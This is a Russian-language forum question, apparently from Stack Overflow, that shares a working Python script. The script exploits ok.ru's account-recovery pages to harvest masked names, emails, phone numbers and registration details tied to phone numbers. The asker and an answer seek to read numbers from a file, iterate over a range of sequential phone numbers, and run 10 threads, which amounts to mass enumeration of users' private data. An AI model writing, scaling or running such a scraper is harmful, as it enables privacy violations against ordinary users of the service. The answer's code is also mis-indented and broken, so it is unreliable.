# python3 как считать номер из файла

Tags: python, python-3.x, парсер

подскажите как взять номер из файла, сейчас вызывается так:
python3 test.py 79246202039
а нужно
python3 test.py numbers.txt
и как выставить количество потоков?

```
#!/usr/bin/env python3
import argparse
import requests

import sys
#import re
from bs4 import BeautifulSoup


 



temp = sys.stdout
sys.stdout=open("out.txt","a")
sys.stdout.write(str() + '\n')
OK_LOGIN_URL = \
    'https://www.ok.ru/dk?st.cmd=anonymMain&st.accRecovery=on&st.error=errors.password.wrong'
OK_RECOVER_URL = \
    'https://www.ok.ru/dk?st.cmd=anonymRecoveryAfterFailedLogin&st._aid=LeftColumn_Login_ForgotPassword'


def check_login(login_data):
    session = requests.Session()
    session.get(f'{OK_LOGIN_URL}&st.email={login_data}')
    request = session.get(OK_RECOVER_URL)
    root_soup = BeautifulSoup(request.content, 'html.parser')
    soup = root_soup.find('div', {'data-l': 'registrationContainer,offer_contact_rest'})
    if soup:
        account_info = soup.find('div', {'class': 'ext-registration_tx taCenter'})
        masked_email = soup.find('button', {'data-l': 't,email'})
        masked_phone = soup.find('button', {'data-l': 't,phone'})
        if masked_phone:
            masked_phone = masked_phone.find('div', {'class': 'ext-registration_stub_small_header'}).get_text()
        if masked_email:
            masked_email = masked_email.find('div', {'class': 'ext-registration_stub_small_header'}).get_text()
        if account_info:
            masked_name = account_info.find('div', {'class': 'ext-registration_username_header'})
            if masked_name:
                masked_name = masked_name.get_text()
            account_info = account_info.findAll('div', {'class': 'lstp-t'})
            if account_info:
                profile_info = account_info[0].get_text()
                profile_registred = account_info[1].get_text()
            else:
                profile_info = None
                profile_registred = None
        else:
            return None

        return {
            'masked_name': masked_name,
            'masked_email': masked_email,
            'masked_phone': masked_phone,
            'profile_info': profile_info,
            'profile_registred': profile_registred,
        }

    if root_soup.find('div', {'data-l': 'registrationContainer,home_rest'}):
        return 'not associated'


def console_output(login_data, parsed_response):
    if parsed_response:
        if parsed_response == 'not associated':
            print('{login_data}', "NONE", end="")
        else:
            print(f'{login_data}', end=' ')
            for key, value in parsed_response.items():
                if value:
                    #print(f'{key} - {value}')
                    print(f'{value}', end=' ')
           
    else:
        print('No fault, but server return unknown response')


def console_run():
    arg_parser = argparse.ArgumentParser(description='Simple checker for ok.ru partial private data disclosure')
    arg_parser.add_argument('login_data', help='known credential to check (email / phone number / username)')
    args = arg_parser.parse_args()
    login_data = args.login_data
    response = check_login(login_data)
    console_output(login_data, response)


if __name__ == '__main__':
    console_run()
    sys.stdout.close()
    sys.stdout = temp
```

Answer (score 0):

```
def console_run():
    arg_parser = argparse.ArgumentParser(description='Simple checker for ok.ru partial private data disclosure')
    arg_parser.add_argument('login_data', help='known credential to check (email / phone number / username)')
    args = arg_parser.parse_args()
    login_data = args.login_data
for login_data in range(79260700000,79260700200+1):
    response = check_login(login_data)
    console_output(login_data, response)
```

добавил эту строку for login_data in range(79260700000,79260700200+1):, и это работает, но в один поток, подскажите как прописать 10 threads

Comment: https://stackoverflow.com/q/2846653